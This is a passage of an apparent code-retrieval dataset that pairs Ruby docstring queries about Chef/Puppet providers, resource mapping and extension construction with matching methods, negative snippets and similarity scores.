| query (stringlengths 7–9.55k) | document (stringlengths 10–363k) | metadata (dict) | negatives (listlengths 0–101) | negative_scores (listlengths 0–101) | document_score (stringlengths 3–10) | document_rank (stringclasses, 102 values) |
|---|---|---|---|---|---|---|
Maps the provider to its lightweight resource.
|
def map_resource(file)
  # Use the block form so the handle is closed even when we break early
  File.open(File.expand_path(file), 'r') do |file_handle|
    file_handle.readlines.each do |line|
      if line =~ /#\s@resource/
        resource_name = line.split(%r{@resource })[1].strip
        @resource = ChefObject.register(RESOURCE, resource_name, :resource)
        @resource.providers.push(self) unless @resource.providers.include?(self)
        break
      end
    end
  end
end
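
A minimal usage sketch of the mapping above; the provider file, resource name, and `LightweightProvider` wrapper class below are hypothetical, and only the `# @resource` annotation format comes from the code itself:

# providers/deploy.rb -- hypothetical lightweight provider source
# @resource my_app_deploy

provider = LightweightProvider.new             # hypothetical wrapper class
provider.map_resource('providers/deploy.rb')
# @resource now holds the ChefObject registered as "my_app_deploy",
# with this provider appended to its providers list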
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def provider; end",
"def map_resource(*args, &block)\n map_enclosing_resource(*args, &block)\n end",
"def test_initialize_finds_records\n prov = mkprovider\n prov.default_target = :yayness\n\n prov.target_object(:yayness).write \"bill a c\\njill b d\"\n\n prov.prefetch\n\n # Now make a resource\n bill = @type.new :name => \"bill\"\n\n assert_equal(\"a\", bill.provider.one, \"Record was not found in memory\")\n end",
"def _provider( name, options )\n\n\t\t\t@_provider ||= { }\n\t\t\t@_provider[ name ] ||= (\n\n\t\t\t\tObject::const_get( name ).new( options )\n\t\t\t)\n\t\tend",
"def use_provider( name )\n name = name.to_s\n raise Polylog::UnknownProvider, \"unknown provider: #{name.inspect}\" unless @providers.key? name\n\n @provider = @providers[name]\n end",
"def resource(uri, opts = {})\n #resource = Resource.new(self, uri, opts)\n @resources ||= {}\n @resources[uri] ||= Resource.new(self, uri, opts)\n end",
"def create_simple_provider_source\n create_source(PROVIDER_TEMPLATE, provider_path)\n end",
"def new_from_resource(rsrc); self.class.new_from_resource(rsrc) end",
"def provider=(_arg0); end",
"def provide(oid = :all, &block)\n provider = Provider.new(oid)\n provider.instance_eval(&block)\n\n # Providers are pushed onto the end of the provider queue.\n # When dispatching, this is searched in order for a match.\n # So, like exception handlers, you such specify providers\n # in order of most -> least specific oid. ('1.3.1' comes before '1.3')\n providers << provider\n end",
"def my_provider\n self.class.my_provider\n end",
"def use_provider( provider_class, opts = {} )\n opts = opts.merge( sync_file_path: caller_path( caller ) )\n @provider = provider_class.new( self, opts )\n end",
"def new\n self.default_provider.new\n end",
"def resource\n @resource ||= resource_set.createResource(uri)\n end",
"def create\n might_update_resource do\n provider.create\n end\n end",
"def create\n might_update_resource do\n provider.create\n end\n end",
"def create\n might_update_resource do\n provider.create\n end\n end",
"def create\n might_update_resource do\n provider.create\n end\n end",
"def resource(name, type=nil, &block)\n resource = GenericResource.new\n resource.type = type\n resource.evaluate &block\n add_resource name, resource\n end",
"def new\n @provider = Provider.new\n end",
"def method_missing(name, *args, &block)\n if self.provider && provider.respond_to?(name)\n self.provider.send(name, *args, &block)\n else\n super(name, *args, &block)\n end\n end",
"def provider\n\tend",
"def initialize(provider)\n @provider = provider\n end",
"def initialize\n set_default_as_provider\n yield self if block_given?\n end",
"def create_resource_for(resource_name)\n resource = self.class.const_set(resource_name, Class.new(Meli::Base))\n resource.prefix = self.class.prefix\n resource.site = self.class.site\n resource\n end",
"def provider\n use_provider('null') unless defined? @provider\n @provider\n end",
"def set_provider\n @provider = Provider.friendly.find(params[:id])\n end",
"def provide(name, content = T.unsafe(nil), &block); end",
"def resource\n @resource ||= resource_klass.new object\n end",
"def method_missing(name, *args, &blk)\n provider.send(name, *args)\n end",
"def register_provider(name, klass)\n @providers[name] = klass\n end",
"def provider\n get(PROVIDER)\n end",
"def maybe_explicit_provider(resource)\n return nil unless resource.provider\n resource.provider\n end",
"def instantiate\n resource.new(data)\n end",
"def resource(*resources, &block); end",
"def initialize(name, prov={}, attrs={}, sanitize_attributes:false)\n if name.is_a? ResourceLoader\n @provider, @type, @name, @id = name.provider, name.type, name.name, nil\n @path, @namespace = name.path, name.namespace\n else\n @provider, @type, @name, @id = prov[:name], prov[:type], name, prov[:id]\n @path, @namespace = nil, nil\n end\n\n # Duplicate each attribute to ensure they are unique to the instance.\n attributes.each { |key,val| attributes[key] = val.dup }\n\n # Take any named attribute and set its value from the resource name.\n attributes[named_attribute].value = @name unless named_attribute.equal?(NULL)\n\n # Update the attributes with the values from the `attrs` argument.\n attrs.each do |key,val|\n attributes[key].set_value val, sanitize_attributes: sanitize_attributes\n end\n end",
"def prefetch(resources = {})\n\n # generate hash of {provider_name => provider}\n providers = instances.inject({}) do |hash, instance|\n hash[instance.name] = instance\n hash\n end\n\n # For each prefetched resource, try to match it to a provider\n resources.each do |resource_name, resource|\n if provider = providers[resource_name]\n resource.provider = provider\n end\n end\n\n # Generate default providers for resources that don't exist on disk\n resources.values.select {|resource| resource.provider.nil? }.each do |resource|\n resource.provider = new(:name => resource.name, :provider => name, :ensure => :absent)\n end\n end",
"def new(*args)\n obj = super\n @provider_instances << obj\n obj\n end",
"def mappings_provider(provider_name, is_legacy = false)\n return nil if provider_name.nil?\n provider = nil\n module_name = is_legacy ? 'Highlander': 'Cfhighlander'\n begin\n providers = Object.const_get(module_name).const_get('MapProviders')\n providers.const_get(provider_name)\n rescue NameError => e\n if e.to_s.include? \"uninitialized constant\"\n return mappings_provider(provider_name, true) unless is_legacy\n return nil\n end\n STDERR.puts(e.to_s)\n raise e\n end\nend",
"def allocate(template)\n rc = Provider.by_name(@client, template['name'])\n\n return rc if OpenNebula.is_error?(rc)\n\n if rc\n return OpenNebula::Error.new(\"Provider #{template['name']} \" \\\n 'already exists')\n end\n\n rc = nil\n\n begin\n Terraform.p_load\n\n Terraform.check_connection(template)\n\n rc = to_json(template)\n\n return rc if OpenNebula.is_error?(rc)\n rescue StandardError => e\n return OpenNebula::Error.new(e)\n end\n\n template['plain'] ||= {}\n template['plain']['provider'] = template['provider']\n\n super(rc, template['name'], template['plain'])\n end",
"def test_prefetch\n prov = mkprovider\n\n prov.filetype = :ram\n prov.default_target = :default\n\n # Create a couple of demo files\n prov.target_object(:file1).write \"bill b c\\njill b d\"\n\n prov.target_object(:default).write \"will b d\\n\"\n\n # Create some resources for some of those demo files\n bill = mkresource \"bill\", :target => :file1, :one => \"b\", :two => \"c\"\n will = mkresource \"will\", :target => :default, :one => \"b\", :two => \"d\"\n\n resources = {\"bill\" => bill, \"will\" => will}\n prov_ids = {\"bill\" => bill.provider.object_id, \"will\" => will.provider.object_id}\n\n assert_nothing_raised do\n prov.prefetch(resources)\n end\n\n assert(bill.provider.object_id != prov_ids[\"bill\"], \"provider was not replaced in resource\")\n assert(will.provider.object_id != prov_ids[\"will\"], \"provider was not replaced in resource\")\n\n # Make sure we prefetched our resources.\n assert_equal(\"b\", bill.provider.one, \"did not prefetch resource from file1\")\n assert_equal(\"c\", bill.provider.two, \"did not prefetch resource from file1\")\n assert_equal(\"b\", will.provider.one, \"did not prefetch resource from default\")\n assert_equal(\"d\", will.provider.two, \"did not prefetch resource from default\")\n\n # Now modify our resources and write them out, making sure that prefetching\n # hasn't somehow destroyed this ability\n bill[:one] = \"a\"\n will[:one] = \"a\"\n\n assert_apply(bill)\n assert_apply(will)\n\n prov.prefetch(resources)\n assert_equal(\"a\", bill.provider.one, \"did not prefetch resource from file1\")\n assert_equal(\"a\", will.provider.one, \"did not prefetch resource from default\")\n\n assert_equal(\"bill a c\\njill b d\\n\", prov.target_object(:file1).read,\n \"Did not write changed resource correctly\")\n assert_equal(\"will a d\\n\", prov.target_object(:default).read,\n \"Did not write changed default resource correctly\")\n end",
"def create_provider_object(config, logger, metrics, redis_connection_pool, provider_class, provider_name, options)\n provider_klass = Vmpooler::PoolManager::Provider\n provider_klass.constants.each do |classname|\n next unless classname.to_s.casecmp(provider_class) == 0\n\n return provider_klass.const_get(classname).new(config, logger, metrics, redis_connection_pool, provider_name, options)\n end\n raise(\"Provider '#{provider_class}' is unknown for pool with provider name '#{provider_name}'\") if provider_klass.nil?\n end",
"def new(data={})\n self.spira_resource.new(data)\n end",
"def provider\n @provider\n end",
"def load_resource_with_associated_resources\n item = load_resource\n load_storage_system(item)\n\n # item.set_storage_pool(OneviewSDK::StoragePool.new(item.client, name: storage_pool)) if storage_pool\n # Workaround for issue in oneview-sdk:\n if storage_pool\n sp = OneviewSDK::StoragePool.find_by(item.client, name: storage_pool).first\n raise \"Storage Pool '#{sp['name']}' not found\" unless sp\n item['storagePoolUri'] = sp['uri']\n end\n\n item.set_snapshot_pool(OneviewSDK::StoragePool.new(item.client, name: snapshot_pool)) if snapshot_pool\n item.set_storage_volume_template(OneviewSDK::VolumeTemplate.new(item.client, name: volume_template)) if volume_template\n\n # Convert capacity integers to strings\n item['provisionedCapacity'] = item['provisionedCapacity'].to_s if item['provisionedCapacity']\n item['allocatedCapacity'] = item['allocatedCapacity'].to_s if item['allocatedCapacity']\n\n unless item.exists? # Also set provisioningParameters if the volume does not exist\n item['provisioningParameters'] ||= {}\n item['provisioningParameters']['shareable'] = item['shareable'] if item['provisioningParameters']['shareable'].nil?\n item['provisioningParameters']['provisionType'] ||= item['provisionType']\n item['provisioningParameters']['requestedCapacity'] ||= item['provisionedCapacity']\n item['provisioningParameters']['storagePoolUri'] ||= item['storagePoolUri']\n end\n item\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def initialize(resource)\n @resource = resource\n end",
"def initialize(resource)\n if self.class.parsed_NFS == {}\n self.class.prefetch(resource)\n end\n super\n end",
"def providify\n newparam(:provider)\n nil\n end",
"def set_provider\r\n @provider = Provider.find(params[:id])\r\n end",
"def resource_proxy\n resource_proxy_class.new\n end",
"def provider(force_reload=false)\n return @provider unless @provider.nil? || force_reload\n @provider = ServiceProvider.get(@provider_permalink)\n end",
"def load_resource_with_associated_resources\n item = load_resource\n load_storage_system(item)\n\n # item.set_storage_pool(OneviewSDK::StoragePool.new(item.client, name: storage_pool)) if storage_pool\n # Workaround for issue in oneview-sdk:\n if storage_pool\n sp = OneviewSDK::StoragePool.find_by(item.client, name: storage_pool, storageSystemUri: item['storageSystemUri']).first\n raise \"Storage Pool '#{sp['name']}' not found\" unless sp\n item['storagePoolUri'] = sp['uri']\n end\n\n if snapshot_pool\n snapshot_pool_resource = OneviewSDK::StoragePool.find_by(item.client, name: snapshot_pool, storageSystemUri: item['storageSystemUri']).first\n item.set_snapshot_pool(snapshot_pool_resource)\n end\n item.set_storage_volume_template(OneviewSDK::VolumeTemplate.new(item.client, name: volume_template)) if volume_template\n\n # Convert capacity integers to strings\n item['provisionedCapacity'] = item['provisionedCapacity'].to_s if item['provisionedCapacity']\n item['allocatedCapacity'] = item['allocatedCapacity'].to_s if item['allocatedCapacity']\n\n unless item.exists? # Also set provisioningParameters if the volume does not exist\n item['provisioningParameters'] ||= {}\n item['provisioningParameters']['shareable'] = item['shareable'] if item['provisioningParameters']['shareable'].nil?\n item['provisioningParameters']['provisionType'] ||= item['provisionType']\n item['provisioningParameters']['requestedCapacity'] ||= item['provisionedCapacity']\n item['provisioningParameters']['storagePoolUri'] ||= item['storagePoolUri']\n end\n item\n end",
"def resource_map\n return @resource_map unless @resource_map.nil?\n _pos = @_io.pos\n @_io.seek(header.ofs_resource_map)\n @_raw_resource_map = @_io.read_bytes(header.len_resource_map)\n _io__raw_resource_map = Kaitai::Struct::Stream.new(@_raw_resource_map)\n @resource_map = ResourceMap.new(_io__raw_resource_map, self, @_root)\n @_io.seek(_pos)\n @resource_map\n end",
"def build_resource(hash = {})\n self.resource = resource_class.new(hash)\n end",
"def add_mapping(resource, options); end",
"def get_resource\n\t\t\tlogger.debug {\"ALLOCATING NEW RESOURCE --> #{ ActiveOrient.db_pool.size }\" }\n login = [ActiveOrient.default_server[:user] , ActiveOrient.default_server[:password]]\n server_adress = \"http://#{ActiveOrient.default_server[:server]}:#{ActiveOrient.default_server[:port]}\"\n\t\t\t RestClient::Resource.new(server_adress, *login)\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_resource(resource = nil)\n resource ||= if resource_class.respond_to? :cache_fetch\n resource_class.cache_fetch(id: params[:id]) { resource_class.find(params[:id]) }\n else\n resource_class.find(params[:id])\n end\n instance_variable_set(\"@#{resource_name}\", resource)\n end",
"def for(resource)\n @resource = resource\n self\n end",
"def load_current_resource; end",
"def get_resource(name)\n resource = Resource.new\n resource.name = name\n resource.get_resource\n yield resource.resource if block_given?\n resource\n end",
"def resource_locator(resource)\n ::Decidim::ResourceLocatorPresenter.new(resource)\n end",
"def build_resource\n self.resource = resource_class.new(resource_params)\n end",
"def initialize_provider(provider=nil)\n prv = cleanup_provider(Souffle::Config[:provider])\n Souffle::Provider.const_get(prv).new\n rescue Souffle::Exceptions::InvalidAwsKeys => e\n Souffle::Log.error \"#{e.message}:\\n#{e.backtrace.join(\"\\n\")}\"\n rescue Exception\n raise Souffle::Exceptions::InvalidProvider,\n \"The provider Souffle::Provider::#{prv} does not exist.\"\n end",
"def resolve_provider\n attributes.fetch(:resolveProvider)\n end",
"def provide\n raise NotImplementedError\n end",
"def resource(name, &block)\n # It creates a new class based on the resource name scoped tot he Scrumy module\n klass = Scrumy::Models.const_set(name.to_s.classify, Class.new(Scrumy::Models::Model))\n # Then executes the block on the class. The class provides several class\n # methods for making instances behave correctly.\n klass.class_exec &block\nend",
"def set_resource\n instance_variable_set(\"@#{resource_name}\", load_resource)\n end",
"def resource_set klass, resource_name, data\n\t\t\t\t@monitor.synchronize do\n\t\t\t\t\textension = File.extname(resource_name)\n\t\t\t\t\tif @resource_extensions.include? extension\n\t\t\t\t\t\tload, save = @resource_extensions[extension]\n\t\t\t\t\t\tdata = save.call data, klass, resource_name\n\t\t\t\t\tend\n\t\t\t\t\t\n\t\t\t\t\tfound = false\n\t\t\t\t\tproviders.each do |p|\n\t\t\t\t\t\tnext unless p.class_exist?(klass.name)\n\t\t\t\t\t\tp.resource_set klass.name, resource_name, data\n\t\t\t\t\t\tfound = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\tend\n\t\t\t\t\t\n\t\t\t\t\traise \"Class '#{klass.name}' doesn't exist!\" unless found\n\t\t\t\tend\n\t\t\tend",
"def provide(domain, &block)\n @providers[domain] << block\n end",
"def resource(set_name, path, &block)\n self.class.resource(set_name, path, &block)\n end",
"def show\n @provider = Provider.find(params[:id])\n map_type = GMapType::G_HYBRID_MAP\n coords = @provider.locations.first.fetch_coordinates()\n @map = GMap.new(\"map\")\n @map.control_init(:large_map => true, :map_type => true, :street_view_control => true)\n @map.center_zoom_init(coords,14)\n @map.overlay_init(GMarker.new(coords,:title => \"#{@provider.full_name}\", :info_window => \"Provider Location\"))\n @map.set_map_type_init(map_type)\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @provider }\n format.json { }\n end\n end",
"def build_resource(hash=nil)\n self.resource = resource_class.new_with_session(hash || {}, session)\n end",
"def initialize(resource)\n if self.class.parsed_auth_db == {}\n self.class.prefetch(resource)\n end\n super\n end",
"def provider=(provider)\n @provider = provider\n end",
"def resource\n @resource ||= begin\n resource_constant.new(attributes)\n end\n end",
"def call_provider(_value); end",
"def initialize(resource)\n @resource = resource\n end",
"def prepare_resource(name,via = :get)\n preparation = Weary::Resource.new(name)\n preparation.via = via\n preparation.headers = @headers unless @headers.blank?\n preparation.url = \"#{@domain}#{preparation.name}.\" + (@format || :json).to_s if @domain\n preparation\n end",
"def provider=(name)\n return unless name\n\n set_provider(name)\n copy_provider_keys\n end",
"def load_provider_model\n @provider_info_model ||= provider_infos.first\n end",
"def setup\n logger = debug? ? Logger.new($stderr) : nil\n Resource.configure(api_key: api_key, logger: logger)\n\n @map = Map::Builder.new.build\n end",
"def load_current_resource\n @current_resource = Chef::Resource::NexusCapability.new(new_resource.name)\n\n run_context.include_recipe \"nexus::cli\"\n Chef::Nexus.ensure_nexus_available(node)\n\n @current_resource\nend",
"def map(&block)\n resources.map(*args, &block)\n end",
"def initialize(resource)\n @resource = resource\n end",
"def initialize(name, provider)\n @name = name\n @provider = provider\n end",
"def new\n build_resource\n yield resource if block_given?\n end",
"def retrieve\n provider.send(self.class.name)\n end",
"def provider\n begin\n @provider ||= eval(\"MusicProviders::#{source}\").new\n rescue\n @provider = MusicProviders::DefaultProvider.new\n end\n end",
"def provider\n SwitchUser::Provider.init(self)\n end",
"def resolve_resource(resource, resources, am_manager, authorizer)\n debug \"resolve_resource: resource: #{resource}, resources: #{resources}\"\n descr = {}\n descr[:domain] = resource[:domain]\n descr[:exclusive] = resource[:exclusive]\n\n av_resources = get_available_components(descr, resource[:type], resource[:valid_from], resource[:valid_until], resources, 1, am_manager, authorizer)\n\n raise OMF::SFA::AM::UnavailableResourceException if av_resources.empty?\n\n res = av_resources.sample\n resource[:uuid] = res.uuid.to_s\n resource[:urn] = res.urn\n resource[:urn]\n end",
"def qualify(api_map, context = T.unsafe(nil)); end",
"def implementer\n provider\n end"
] |
[
"0.619483",
"0.6116507",
"0.61114836",
"0.59024763",
"0.59022415",
"0.58697927",
"0.5845976",
"0.58332676",
"0.57967645",
"0.57821023",
"0.5757989",
"0.57547903",
"0.57504916",
"0.57383555",
"0.5731324",
"0.5731324",
"0.5731324",
"0.5731324",
"0.57086384",
"0.5698226",
"0.56974757",
"0.5680417",
"0.5646967",
"0.56388557",
"0.5629987",
"0.55832475",
"0.5580032",
"0.55715036",
"0.55227673",
"0.5521425",
"0.551156",
"0.55059725",
"0.55027866",
"0.55024415",
"0.5500581",
"0.5497364",
"0.5482986",
"0.54754716",
"0.5460767",
"0.5430539",
"0.5420687",
"0.5400889",
"0.53938353",
"0.5393336",
"0.5378789",
"0.537838",
"0.53781325",
"0.53775656",
"0.5371489",
"0.53677183",
"0.53644675",
"0.53562886",
"0.5353303",
"0.5351961",
"0.5351548",
"0.53292626",
"0.5329149",
"0.5328534",
"0.5328534",
"0.5328534",
"0.5328534",
"0.5328534",
"0.5328534",
"0.5328534",
"0.5312507",
"0.5306837",
"0.52978617",
"0.5293756",
"0.5279998",
"0.5277859",
"0.5272492",
"0.5258953",
"0.52584326",
"0.52510566",
"0.5249211",
"0.52432585",
"0.52432066",
"0.52428883",
"0.5236018",
"0.5215947",
"0.520231",
"0.51856685",
"0.51815736",
"0.5175718",
"0.5173395",
"0.5159612",
"0.51508707",
"0.5145426",
"0.51408225",
"0.51398283",
"0.513767",
"0.5117122",
"0.5116818",
"0.5116668",
"0.51146334",
"0.5103064",
"0.5098871",
"0.5094509",
"0.50898486",
"0.50895524"
] |
0.58592755
|
6
|
Actions implemented in the lightweight provider.
|
def actions
children_by_type(:action)
end
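
`children_by_type` is not shown in this snippet; a minimal sketch of the shape it implies, assuming the provider model keeps a flat `@children` array of parsed elements, each tagged with a type symbol (all names here are assumptions):

def children_by_type(type)
  # Keep only the parsed child elements tagged with the requested type,
  # e.g. :action for the actions a lightweight provider implements
  @children.select { |child| child.type == type }
end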
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def actions; end",
"def run_actions; end",
"def provider; end",
"def action_hook; end",
"def add_actions; end",
"def handlers; end",
"def handlers; end",
"def handlers; end",
"def handler; end",
"def handler; end",
"def methods() end",
"def operations; end",
"def operations; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def provider\n\tend",
"def act\n end",
"def methods; end",
"def methods; end",
"def methods; end",
"def methods; end",
"def release_actions; end",
"def action_run\n end",
"def action_methods; end",
"def action_methods; end",
"def action_methods; end",
"def handle; end",
"def perform_action(data); end",
"def action_missing(*)\n end",
"def fetch\n end",
"def invoke; end",
"def lookup_action; end",
"def handle\n end",
"def perform_action(*args)\n end",
"def run\n super\n \n # Now that we have our core details, check cloud statusi\n cloud_providers = determine_cloud_status(@entity)\n _log \"Got: #{cloud_providers}\"\n\n _set_entity_detail \"cloud_providers\", cloud_providers.uniq.sort\n _set_entity_detail \"cloud_hosted\", !cloud_providers.empty?\n \n end",
"def actions() ; info[:actions] ; end",
"def actions() ; info[:actions] ; end",
"def perform\n \n end",
"def callbacks; end",
"def callbacks; end",
"def perform; end",
"def perform; end",
"def _handle_action_missing(*args); end",
"def define_action_hook; end",
"def internal; end",
"def action args = {}\n\t\tend",
"def invoke\r\n # TODO: rename to more appropriate one 2007/05/10 by shino\r\n raise 'must be implemented in subclasses'\r\n end",
"def mco_action\n raise RuntimeError, \"Not implemented\"\n end",
"def api; end",
"def api; end",
"def call\n\n\tend",
"def call\n\n\tend",
"def call\n # implement in subclasses\n end",
"def perform_raw; end",
"def action\n end",
"def operation; end",
"def handler_method; end",
"def fetch\n raise NotImplementedError\n end",
"def perform(*args)\n\tend",
"def implementation; end",
"def implementation; end",
"def resource; end",
"def method_missing(action, *args, &block)\n return nil\n end",
"def retrieve\n end",
"def dispatch\n raise NotImplementedError\n end",
"def action\n end",
"def actions\n client.actions\n end",
"def call\n raise NotImplementedError,\n \"Override #call and implement your application logic.\"\n end",
"def invoke\n raise NotImplementedError, \"Author of subclass forgot to implement #invoke\"\n end",
"def executor; end",
"def executor; end",
"def executor; end",
"def fetch; end",
"def fetch; end",
"def click_action\n raise NotImplementedError \"Subclasses must implement this method\"\n end",
"def fetch(*)\n raise NotImplementedError, 'This should be defined in a subclass'\n end",
"def provider=(_arg0); end",
"def manage\n\n end",
"def action(unit)\n\tend",
"def action_locator_args()\n \n end",
"def perform\n raise NotImplementedError\n end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def action\n super\n end",
"def private; end",
"def perform\n raise NotImplementedError\n end",
"def context_methods; end",
"def context; end",
"def context; end"
] |
[
"0.6830602",
"0.68000126",
"0.6506426",
"0.64876336",
"0.6398637",
"0.6345477",
"0.6345477",
"0.6345477",
"0.6256118",
"0.6256118",
"0.6222472",
"0.62031734",
"0.62031734",
"0.6193786",
"0.6193786",
"0.6193786",
"0.6193786",
"0.6193786",
"0.61442804",
"0.6126431",
"0.61225235",
"0.61225235",
"0.61225235",
"0.61225235",
"0.61106247",
"0.60729694",
"0.60353017",
"0.60353017",
"0.60353017",
"0.60280704",
"0.60276306",
"0.60186595",
"0.59816086",
"0.5975354",
"0.59674853",
"0.5949203",
"0.59196436",
"0.58850324",
"0.5874148",
"0.5874148",
"0.5873388",
"0.5832085",
"0.5832085",
"0.5818901",
"0.5818901",
"0.5815811",
"0.5775052",
"0.57703316",
"0.57700723",
"0.57660043",
"0.57655305",
"0.5763485",
"0.5763485",
"0.5762643",
"0.5762643",
"0.57531214",
"0.5751514",
"0.5744972",
"0.57427275",
"0.5740921",
"0.5735705",
"0.57240665",
"0.5704006",
"0.5704006",
"0.5703491",
"0.56954205",
"0.56730765",
"0.56721175",
"0.56657827",
"0.5658469",
"0.56565946",
"0.5656038",
"0.56510574",
"0.56510574",
"0.56510574",
"0.56498915",
"0.56498915",
"0.5648413",
"0.5648214",
"0.56448126",
"0.5638952",
"0.5633598",
"0.5629678",
"0.5615486",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.56086046",
"0.5607712",
"0.5605893",
"0.559737",
"0.5595944",
"0.5595944"
] |
0.0
|
-1
|
Create a new Ruby extension with a given name. This name will be the actual name of the extension: the build produces name.so, and you call require 'name' to use your new extension. The constructor can be called standalone or with a block.
|
def initialize(name, &block)
@name = name
@modules = []
@writer_mode = :multiple
@requesting_console = false
@force_rebuild = false
@options = {
:include_paths => [],
:library_paths => [],
:libraries => [],
:cxxflags => [],
:ldflags => [],
:include_source_files => [],
:includes => []
}
@node = nil
parse_command_line
if requesting_console?
block.call(self) if block
start_console
elsif block
build_working_dir(&block)
block.call(self)
build
write
compile
end
end
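
A typical block-form call might look like the following; a minimal sketch assuming this is rb++'s Extension class (suggested by the RbGCCXML usage elsewhere in this set), with hypothetical paths:

require 'rbplusplus'   # assumption: the constructor above is rb++'s Extension#initialize
include RbPlusPlus

Extension.new('my_extension') do |e|
  # The block receives the extension object; point it at the headers to wrap
  e.sources "#{Dir.pwd}/headers/*.h",
            :include_paths => ["#{Dir.pwd}/headers"]
end
# The constructor then runs build, write, and compile, producing
# my_extension.so, which is loaded with: require 'my_extension'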
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_module(name, &block)\n mod = Module.new(&block)\n @managed.const_set(name, mod)\n mod\n end",
"def initialize(name)\n @path, @name = nil\n\n if File.directory?(name)\n @path, @name = name, File.basename(name)\n\n elsif Main.respond_to?(:extensions_path)\n @name = name\n [Main.extensions_path].flatten.each do |dir|\n next unless @path.nil?\n @path = File.join(dir, name)\n @path = nil unless File.directory?(@path)\n end\n end\n\n raise ExtensionNotFound unless File.directory?(@path.to_s)\n end",
"def create(name)\n\t\t\n\t\t# if (mod_ambiguous[name])\n\t\t#\traise Rex::AmbiguousArgumentError.new(name), \n\t\t#\t\t\"The module name #{name} is ambiguous.\", caller\n\t\t# end\n\n\t\tklass = get_hash_val(name)\n\t\tinstance = nil\n\n\t\t# If there is no module associated with this class, then try to demand\n\t\t# load it.\n\t\tif (klass.nil? or klass == SymbolicModule)\n\t\t\t# If we are the root module set, then we need to try each module\n\t\t\t# type's demand loading until we find one that works for us.\n\t\t\tif (module_type.nil?)\n\t\t\t\tMODULE_TYPES.each { |type|\n\t\t\t\t\tframework.modules.demand_load_module(type + '/' + name)\n\t\t\t\t}\n\t\t\telse\n\t\t\t\tframework.modules.demand_load_module(module_type + '/' + name)\n\t\t\tend\n\n\t\t\tklass = get_hash_val(name)\n\t\tend\n\n\t\t# If the klass is valid for this name, try to create it\n\t\tif (klass and klass != SymbolicModule)\n\t\t\tinstance = klass.new\n\t\tend\n\n\t\t# Notify any general subscribers of the creation event\n\t\tif (instance)\n\t\t\tself.framework.events.on_module_created(instance)\n\t\tend\n\n\t\treturn instance\n\tend",
"def new(namespace, name, *args, &block); end",
"def initialize(java_name, rubymod = nil)\n pkg = java_name.split(JAVA_PKG_SEP)\n pkg = rubymod ? [rubymod, ns2mod(pkg[-1])] : pkg.map { |part| ns2mod(part) }\n\n parts = pkg.pop.split(JAVA_CLASS_SEP)\n @basename = parts.pop\n @outter_class = parts.join(RUBY_PKG_SEP)\n @module = rubymod || pkg.join(RUBY_PKG_SEP)\n @name = [@module, @outter_class, @basename].reject(&:empty?).join(RUBY_PKG_SEP)\n\n super @name\n end",
"def initialize(name,&ruby_block)\n # Checks and sets the name.\n @name = name.to_sym\n # Sets the block for instantiating a task.\n @ruby_block = ruby_block\n # Sets the instantiation procedure if named.\n return if @name.empty?\n obj = self\n HDLRuby::High.space_reg(@name) do |*args|\n obj.instantiate(*args)\n end\n end",
"def initialize(name=nil, version=nil)\n init(name, version)\n yield self if block_given?\n define unless name.nil?\n end",
"def initialize(name=nil, version=nil)\n init(name, version)\n yield self if block_given?\n define unless name.nil?\n end",
"def initialize(name=nil, version=nil)\n init(name, version)\n yield self if block_given?\n define unless name.nil?\n end",
"def initialize(name)\n @r = name\n list = FILE_LIST\n\n list = list << {:name=>\"lib/#{name}\", :file=>false}\n list = list << {:name=>\"spec/#{name}_spec.rb\", :file=>true}\n\n super(name, list)\n\n\n end",
"def initialize(name)\n @name = name\n freeze\n end",
"def initialize(name) end",
"def initialize(name, depth = nil, overflow = nil, &ruby_block)\n @name = name.to_sym\n @body = ruby_block\n @depth = depth ? depth.to_i : nil\n @overflow = overflow ? overflow.to_proc : nil\n end",
"def initialize(source)\n source = source.sub('.rb', '')\n require source\n @module_name = pascalize(File.basename(source))\n extend self.class.module_eval(@module_name)\n end",
"def initialize(name, *args)\n @name = name\n @options = args.extract_options!\n @iv_name = (args.first || @name).to_s.gsub('.', '_')\n @registry = []\n end",
"def create(name)\n klass = fetch(name, nil)\n instance = nil\n\n # If there is no module associated with this class, then try to demand\n # load it.\n if klass.nil? or klass == Msf::SymbolicModule\n # If we are the root module set, then we need to try each module\n # type's demand loading until we find one that works for us.\n if module_type.nil?\n Msf::MODULE_TYPES.each { |type|\n framework.modules.load_cached_module(type, name)\n }\n else\n framework.modules.load_cached_module(module_type, name)\n end\n\n recalculate\n\n klass = fetch(name, nil)\n end\n\n # If the klass is valid for this name, try to create it\n unless klass.nil? or klass == Msf::SymbolicModule\n instance = klass.new\n end\n\n # Notify any general subscribers of the creation event\n if instance\n self.framework.events.on_module_created(instance)\n end\n\n return instance\n end",
"def initialize(name)\n @block = ->(*args) { new(*args).public_send(name) }\n end",
"def initialize(name)\n @block = ->(*args) { new(*args).public_send(name) }\n end",
"def initialize(name, interpreter)\n @name = name\n @interpreter = interpreter\n end",
"def module(name, &block)\n m = RbModule.new(name, @parser, &block)\n @modules << m\n m\n end",
"def initialize(name, ruby_type = nil)\n @name = name\n @ruby_type = ruby_type || \"_unknown\"\n end",
"def initialize(name)\n init(name)\n yield self if block_given?\n define unless name.nil?\n puts \"Windows users require sed and perl for rake:compile - please install onto PATH\" if /mswin|mingw/ =~ RUBY_PLATFORM\n end",
